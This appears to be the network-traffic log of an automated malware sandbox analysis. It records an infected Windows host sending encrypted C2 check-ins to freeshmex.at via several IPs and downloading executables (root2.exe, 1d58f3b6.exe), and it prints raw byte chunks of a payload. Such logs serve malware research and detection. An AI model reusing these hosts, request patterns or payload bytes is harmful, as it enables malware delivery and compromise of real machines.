                    Nov 24, 2022 20:13:40.187788963 CET  1821  IN  HTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:39 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                    34  192.168.2.4  49731  190.140.74.43  80  C:\Windows\explorer.exe
                    Timestamp  kBytes transferred  Direction  Data
                    Nov 24, 2022 20:13:40.417757988 CET  1822  OUT  POST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://sloljasy.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 116
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:40.420681953 CET | 1822 | OUT | Data Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 2b 5e d1 87
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vu+^PoB]6:s]d);
                    Nov 24, 2022 20:13:41.290025949 CET | 1823 | IN | HTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:40 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    35 | 192.168.2.4 | 49732 | 109.102.255.230 | 80 | C:\Windows\explorer.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Nov 24, 2022 20:13:41.379910946 CET | 1824 | OUT | POST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://yrxav.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 263
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:41.382425070 CET | 1824 | OUT | Data Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 14 6b 2c 90 f5 76 0b 75 61 03 f1 8f
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vuajXLGTTPu0__XB63[ Y"OAWpL'r_kcor((/;J"mpwMxHWU3DP.6J(~
                    Nov 24, 2022 20:13:41.702302933 CET | 1825 | IN | HTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:41 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    4 | 192.168.2.4 | 49699 | 211.171.233.129 | 80 | C:\Windows\explorer.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Nov 24, 2022 20:13:05.929245949 CET | 142 | OUT | POST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://fjuand.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 293
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:05.929267883 CET | 143 | OUT | Data Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 2d 40 a2 a6
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vu-@wNsw\13*uk9GZ[8N3u%6hn[\0sq8lQ[&*BNh7R\a
                    Nov 24, 2022 20:13:07.234910011 CET | 143 | IN | HTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:06 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    5 | 192.168.2.4 | 49700 | 109.102.255.230 | 80 | C:\Windows\explorer.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Nov 24, 2022 20:13:07.766982079 CET | 144 | OUT | POST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://ugahgtu.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 177
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:07.767508030 CET | 145 | OUT | Data Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 35 45 d9 82
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vu5EOGPcEB].7@C}4x1,&z+Z%yg5M(`K L@L
                    Nov 24, 2022 20:13:08.075387001 CET | 145 | IN | HTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:07 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 43
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 28 59 39 08 a6 6d 59 b5 ab 15 bd cf b5 fa 6d 86 21 da ec 71 14 10 94 8f
                    Data Ascii: #\(Y9mYm!q


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    6 | 192.168.2.4 | 49701 | 123.253.32.170 | 80 | C:\Windows\explorer.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Nov 24, 2022 20:13:08.363487005 CET | 146 | OUT | GET /root2.exe HTTP/1.1
                    Connection: Keep-Alive
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Host: 123.253.32.170
                    Nov 24, 2022 20:13:08.644607067 CET | 147 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.14.2
                    Date: Thu, 24 Nov 2022 19:13:08 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 1041408
                    Last-Modified: Thu, 24 Nov 2022 19:10:04 GMT
                    Connection: keep-alive
                    ETag: "637fc18c-fe400"
                    Accept-Ranges: bytes


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    7 | 192.168.2.4 | 49702 | 95.107.163.44 | 80 | C:\Windows\explorer.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Nov 24, 2022 20:13:14.645796061 CET | 1236 | OUT | POST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://cbcxtvmmly.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 253
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:14.645796061 CET | 1236 | OUT | Data Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 09 6b 2c 90 f4 76 0b 75 59 51 ca af
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA ,[k,vuYQs-SgiLf`f_@m6]=]&209OD`dG3VlM,}J-53)3NoRYYaof#E!
                    Nov 24, 2022 20:13:14.799427986 CET | 1237 | IN | HTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:14 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    8 | 192.168.2.4 | 49703 | 109.102.255.230 | 80 | C:\Windows\explorer.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Nov 24, 2022 20:13:14.908205986 CET | 1238 | OUT | POST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://jmhsk.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 227
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:14.908343077 CET | 1238 | OUT | Data Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 24 29 f3 96
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vu$)LBtuFf'(("YrJ>DN7Q/\/'deD]S7##&ZM$%u
                    Nov 24, 2022 20:13:15.188304901 CET | 1239 | IN | HTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:15 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    9 | 192.168.2.4 | 49704 | 95.107.163.44 | 80 | C:\Windows\explorer.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Nov 24, 2022 20:13:15.651551962 CET | 1240 | OUT | POST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://cxmexebq.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 312
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:15.651583910 CET | 1240 | OUT | Data Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 27 1e c2 bb
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vu'n:UTj<f_QoQWGoL`9FU~7CVV_B&{Ba<L>@rzDbRFdUFO<gryfE
                    Nov 24, 2022 20:13:15.837204933 CET | 1241 | IN | HTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:15 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    0 | 192.168.2.4 | 49715 | 5.135.247.111 | 443 | C:\Windows\explorer.exe
                    Timestamp | kBytes transferred | Direction | Data
                    2022-11-24 19:13:26 UTC | 0 | OUT | GET /upload/index.php HTTP/1.1
                    Connection: Keep-Alive
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Host: thepokeway.nl
                    2022-11-24 19:13:26 UTC | 0 | IN | HTTP/1.1 200 OK
                    Date: Thu, 24 Nov 2022 19:13:26 GMT
                    Server: Apache
                    Content-Description: File Transfer
                    Content-Disposition: attachment; filename=1d58f3b6.exe
                    Content-Transfer-Encoding: binary
                    Expires: 0
                    Cache-Control: must-revalidate
                    Pragma: public
                    Vary: Accept-Encoding
                    Connection: close
                    Transfer-Encoding: chunked
                    Content-Type: application/octet-stream
                    Data Ascii: 2000F@uwV.YYttziPGA$u)ttziPG@$tWWWWW-M9}u!NxEVuSYYEEEHuV$RYUuD@u@@3tPuY]3]U]
                    2022-11-24 19:13:26 UTC32INData Raw: 74 20 d9 c9 db bd
                    Data Ascii: t
                    2022-11-24 19:13:26 UTC32INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC32INData Raw: 32 30 30 30 0d 0a 62 ff ff ff db ad 62 ff ff ff f6 85 69 ff ff ff 40 74 09 c6 85 70 ff ff ff 07 eb 07 c6 85 70 ff ff ff 01 de c1 c3 dd d8 dd d8 db 2d e0 b8 47 00 80 bd 70 ff ff ff 00 7f 07 c6 85 70 ff ff ff 01 0a c9 c3 0a c9 74 02 d9 e0 c3 cc cc cc cc cc cc db 6c 24 10 db 6c 24 04 8b 44 24 08 03 c0 0f 83 86 00 00 00 35 00 00 00 0e a9 00 00 00 0e 74 03 de f9 c3 c1 e8 1c 80 b8 10 b9 47 00 00 75 03 de f9 c3 8b 44 24 0c 25 ff 7f 00 00 74 67 3d ff 7f 00 00 74 60 d9 7c 24 1c 8b 44 24 1c 0d 3f 03 00 00 25 ff f3 00 00 89 44 24 20 d9 6c 24 20 8b 44 24 18 25 ff 7f 00 00 83 f8 01 74 17 d8 0d 20 b9 47 00 d9 c9 d8 0d 20 b9 47 00 d9 c9 d9 6c 24 1c de f9 c3 d8 0d 24 b9 47 00 d9 c9 d8 0d 24 b9 47 00 d9 c9 d9 6c 24 1c de f9 c3 8b 44 24 04 0b 44 24 08 75 03 de f9 c3 8b 44
                    Data Ascii: 2000bbi@tpp-Gpptl$l$D$5tGuD$%tg=t`|$D$?%D$ l$ D$%t G Gl$$G$Gl$D$D$uD
                    2022-11-24 19:13:26 UTC40INData Raw: 75 d8 e8 d7 bb ff
                    Data Ascii: u
                    2022-11-24 19:13:26 UTC40INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC40INData Raw: 32 30 30 30 0d 0a ff 59 e8 1b f7 ff ff 8b 4d d4 89 88 88 00 00 00 e8 0d f7 ff ff 8b 4d d0 89 88 8c 00 00 00 81 3e 63 73 6d e0 75 42 83 7e 10 03 75 3c 8b 46 14 3d 20 05 93 19 74 0e 3d 21 05 93 19 74 07 3d 22 05 93 19 75 24 83 7d cc 00 75 1e 83 7d e4 00 74 18 ff 76 18 e8 59 bb ff ff 59 85 c0 74 0b ff 75 10 56 e8 25 fd ff ff 59 59 c3 6a 0c 68 00 9d 41 00 e8 07 08 00 00 33 d2 89 55 e4 8b 45 10 8b 48 04 3b ca 0f 84 58 01 00 00 38 51 08 0f 84 4f 01 00 00 8b 48 08 3b ca 75 0c f7 00 00 00 00 80 0f 84 3c 01 00 00 8b 00 8b 75 0c 85 c0 78 04 8d 74 31 0c 89 55 fc 33 db 43 53 a8 08 74 41 8b 7d 08 ff 77 18 e8 c5 66 00 00 59 59 85 c0 0f 84 f2 00 00 00 53 56 e8 b4 66 00 00 59 59 85 c0 0f 84 e1 00 00 00 8b 47 18 89 06 8b 4d 14 83 c1 08 51 50 e8 ec fc ff ff 59 59 89 06 e9
                    Data Ascii: 2000YMM>csmuB~u<F= t=!t="u$}u}tvYYtuV%YYjhA3UEH;X8QOH;u<uxt1U3CStA}wfYYSVfYYGMQPYY
                    2022-11-24 19:13:26 UTC48INData Raw: 00 8b 95 64 fe ff
                    Data Ascii: d
                    2022-11-24 19:13:26 UTC48INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC48INData Raw: 32 30 30 30 0d 0a ff ff 85 74 fe ff ff e8 d6 f9 ff ff 89 85 78 fe ff ff 0f b6 c0 50 e8 fb 37 00 00 59 85 c0 75 8a 83 bd 58 fe ff ff 00 0f 84 5f 01 00 00 83 bd 78 fe ff ff 65 74 0d 83 bd 78 fe ff ff 45 0f 85 49 01 00 00 8b 85 6c fe ff ff ff 8d 6c fe ff ff 85 c0 0f 84 35 01 00 00 8b 85 54 fe ff ff c6 04 03 65 8d 85 30 fe ff ff 50 8d 85 7c fe ff ff 50 43 53 8d bd 54 fe ff ff 8d b5 24 fe ff ff e8 e9 f8 ff ff 83 c4 0c 85 c0 0f 84 f5 08 00 00 8b 95 64 fe ff ff ff 85 74 fe ff ff e8 44 f9 ff ff 89 85 78 fe ff ff 83 f8 2d 75 2c 8b 85 54 fe ff ff c6 04 03 2d 8d 85 30 fe ff ff 50 8d 85 7c fe ff ff 50 43 53 e8 a3 f8 ff ff 83 c4 0c 85 c0 0f 84 af 08 00 00 eb 09 83 bd 78 fe ff ff 2b 75 2f 8b 85 6c fe ff ff ff 8d 6c fe ff ff 85 c0 75 08 21 85 6c fe ff ff eb 17 8b 95 64
                    Data Ascii: 2000txP7YuX_xetxEIll5Te0P|PCST$dtDx-u,T-0P|PCSx+u/llu!ld
                    2022-11-24 19:13:26 UTC56INData Raw: 09 75 06 8b 4d 08
                    Data Ascii: uM
                    2022-11-24 19:13:26 UTC56INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC56INData Raw: 31 66 66 38 0d 0a 21 59 04 8b 5d 0c 8b 53 08 8b 5b 04 8b 4d fc 03 4d f4 89 5a 04 8b 55 0c 8b 5a 04 8b 52 08 89 53 08 89 4d fc 8b d1 c1 fa 04 4a 83 fa 3f 76 03 6a 3f 5a 8b 5d f8 83 e3 01 89 5d f4 0f 85 8f 00 00 00 2b 75 f8 8b 5d f8 c1 fb 04 6a 3f 89 75 0c 4b 5e 3b de 76 02 8b de 03 4d f8 8b d1 c1 fa 04 4a 89 4d fc 3b d6 76 02 8b d6 3b da 74 5e 8b 4d 0c 8b 71 04 3b 71 08 75 3b be 00 00 00 80 83 fb 20 73 17 8b cb d3 ee f7 d6 21 74 b8 44 fe 4c 03 04 75 21 8b 4d 08 21 31 eb 1a 8d 4b e0 d3 ee f7 d6 21 b4 b8 c4 00 00 00 fe 4c 03 04 75 06 8b 4d 08 21 71 04 8b 4d 0c 8b 71 08 8b 49 04 89 4e 04 8b 4d 0c 8b 71 04 8b 49 08 89 4e 08 8b 75 0c eb 03 8b 5d 08 83 7d f4 00 75 08 3b da 0f 84 80 00 00 00 8b 4d f0 8d 0c d1 8b 59 04 89 4e 08 89 5e 04 89 71 04 8b 4e 04 89 71 08
                    Data Ascii: 1ff8!Y]S[MMZUZRSMJ?vj?Z]]+u]j?uK^;vMJM;v;t^Mq;qu; s!tDLu!M!1K!LuM!qMqINMqINu]}u;MYN^qNq
                    2022-11-24 19:13:26 UTC64INData Raw: 32 30 30 30 0d 0a
                    Data Ascii: 2000
                    2022-11-24 19:13:26 UTC64INData Raw: ff 08 00 00 00 51 8d 7e 18 57 ff b5 7c ff ff ff e8 bb 4e 00 00 83 c4 0c 85 c0 75 49 8b 43 08 83 f8 10 74 10 83 f8 16 74 0b 83 f8 1d 74 06 83 65 c0 fe eb 12 8b 4d c0 dd 46 10 83 e1 e3 dd 5d b0 83 c9 03 89 4d c0 57 8d 4e 08 51 50 ff b5 7c ff ff ff 8d 85 78 ff ff ff 50 8d 45 80 50 e8 4b 4e 00 00 83 c4 18 68 ff ff 00 00 ff b5 78 ff ff ff e8 8e 50 00 00 83 3e 08 59 59 74 14 83 3d 28 c8 47 00 00 75 0b 56 e8 54 50 00 00 59 85 c0 75 08 ff 36 e8 1b 50 00 00 59 8b 4d fc 5f 33 cd 5e e8 df 63 ff ff 8b e5 5d 8b e3 5b c3 6a 0c 68 58 9e 41 00 e8 cd a7 ff ff 83 65 fc 00 66 0f 28 c1 c7 45 e4 01 00 00 00 eb 23 8b 45 ec 8b 00 8b 00 3d 05 00 00 c0 74 0a 3d 1d 00 00 c0 74 03 33 c0 c3 33 c0 40 c3 8b 65 e8 83 65 e4 00 c7 45 fc fe ff ff ff 8b 45 e4 e8 cf a7 ff ff c3 8b ff 55 8b
                    Data Ascii: Q~W|NuICttteMF]MWNQP|xPEPKNhxP>YYt=(GuVTPYu6PYM_3^c][jhXAef(E#E=t=t33@eeEEU
                    2022-11-24 19:13:26 UTC72INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC72INData Raw: 32 30 30 30 0d 0a 10 f7 e6 03 d1 72 0e 3b 54 24 0c 77 08 72 0f 3b 44 24 08 76 09 4e 2b 44 24 10 1b 54 24 14 33 db 2b 44 24 08 1b 54 24 0c f7 da f7 d8 83 da 00 8b ca 8b d3 8b d9 8b c8 8b c6 5e c2 10 00 8b ff 55 8b ec 83 ec 14 56 57 ff 75 08 8d 4d ec e8 9b 4f ff ff 8b 45 10 8b 75 0c 33 ff 3b c7 74 02 89 30 3b f7 75 2c e8 d6 4b ff ff 57 57 57 57 57 c7 00 16 00 00 00 e8 31 37 ff ff 83 c4 14 80 7d f8 00 74 07 8b 45 f4 83 60 70 fd 33 c0 e9 d8 01 00 00 39 7d 14 74 0c 83 7d 14 02 7c c9 83 7d 14 24 7f c3 8b 4d ec 53 8a 1e 89 7d fc 8d 7e 01 83 b9 ac 00 00 00 01 7e 17 8d 45 ec 50 0f b6 c3 6a 08 50 e8 73 0b 00 00 8b 4d ec 83 c4 0c eb 10 8b 91 c8 00 00 00 0f b6 c3 0f b7 04 42 83 e0 08 85 c0 74 05 8a 1f 47 eb c7 80 fb 2d 75 06 83 4d 18 02 eb 05 80 fb 2b 75 03 8a 1f 47
                    Data Ascii: 2000r;T$wr;D$vN+D$T$3+D$T$^UVWuMOEu3;t0;u,KWWWWW17}tE`p39}t}|}$MS}~~EPjPsMBtG-uM+uG
                    2022-11-24 19:13:26 UTC80INData Raw: 0f b7 c0 33 c9 0f
                    Data Ascii: 3
                    2022-11-24 19:13:26 UTC80INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC80INData Raw: 32 30 30 30 0d 0a bf d8 66 89 4d e0 b9 30 ca 47 00 f7 db 83 e9 60 89 45 b4 66 89 55 ea 89 75 e6 89 7d e2 89 4d 9c 85 db 0f 84 9c 02 00 00 7d 0d b8 90 cb 47 00 f7 db 83 e8 60 89 45 9c 85 db 0f 84 85 02 00 00 83 45 9c 54 8b cb 83 e1 07 c1 fb 03 85 c9 0f 84 67 02 00 00 6b c9 0c 03 4d 9c 8b c1 89 4d bc b9 00 80 00 00 66 39 08 72 11 8b f0 8d 7d c4 a5 a5 8d 45 c4 a5 ff 4d c6 89 45 bc 0f b7 50 0a 33 c9 89 4d ac 89 4d f0 89 4d f4 89 4d f8 8b 4d ea 8b f2 33 f1 81 e6 00 80 00 00 89 75 b8 be ff 7f 00 00 23 ce 23 d6 8d 34 0a 0f b7 fe be ff 7f 00 00 66 3b ce 0f 83 ac 02 00 00 66 3b d6 0f 83 a3 02 00 00 be fd bf 00 00 66 3b fe 0f 87 95 02 00 00 be bf 3f 00 00 66 3b fe 77 10 33 f6 89 75 e8 89 75 e4 89 75 e0 e9 d3 01 00 00 33 f6 66 3b ce 75 1f 47 f7 45 e8 ff ff ff 7f 75
                    Data Ascii: 2000fM0G`EfUu}M}G`EETgkMMf9r}EMEP3MMMMM3u##4f;f;f;?f;w3uuu3f;uGEu
                    2022-11-24 19:13:26 UTC88INData Raw: ff 15 40 11 40 00
                    Data Ascii: @@
                    2022-11-24 19:13:26 UTC88INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC88INData Raw: 32 30 30 30 0d 0a 50 e8 5f 0c ff ff 59 83 4d ec ff 8b 45 f4 3b 45 0c 74 07 50 e8 63 06 ff ff 59 8b 45 ec 83 f8 fe 0f 85 8b 01 00 00 8b 45 f0 e9 83 01 00 00 8b 45 f0 8b 17 33 c9 3b c3 0f 95 c1 03 c0 89 45 f0 89 4c 16 30 eb c6 3b cb 74 0e 8b 4d f4 66 83 39 0a 75 05 80 08 04 eb 03 80 20 fb 8b 5d f4 8b 45 f0 03 c3 89 5d 10 89 45 f0 3b d8 0f 83 ff 00 00 00 8b 45 10 0f b7 08 66 83 f9 1a 0f 84 d7 00 00 00 66 83 f9 0d 74 0f 66 89 0b 43 43 40 40 89 45 10 e9 b4 00 00 00 8b 4d f0 83 c1 fe 3b c1 73 1e 8d 48 02 66 83 39 0a 75 0d 83 c0 04 89 45 10 6a 0a e9 8e 00 00 00 89 4d 10 e9 84 00 00 00 83 45 10 02 6a 00 8d 45 e8 50 6a 02 8d 45 f8 50 8b 07 ff 34 06 ff 15 08 12 40 00 85 c0 75 0a ff 15 40 11 40 00 85 c0 75 5b 83 7d e8 00 74 55 8b 07 f6 44 06 04 48 74 28 66 83 7d f8
                    Data Ascii: 2000P_YME;EtPcYEEE3;EL0;tMf9u ]E]E;EfftfCC@@EM;sHf9uEjMEjEPjEP4@u@@u[}tUDHt(f}
                    2022-11-24 19:13:26 UTC96INData Raw: 00 00 00 00 00 00
                    Data Ascii:
                    2022-11-24 19:13:26 UTC96INData Raw: 0d 0a
                    Data Ascii:
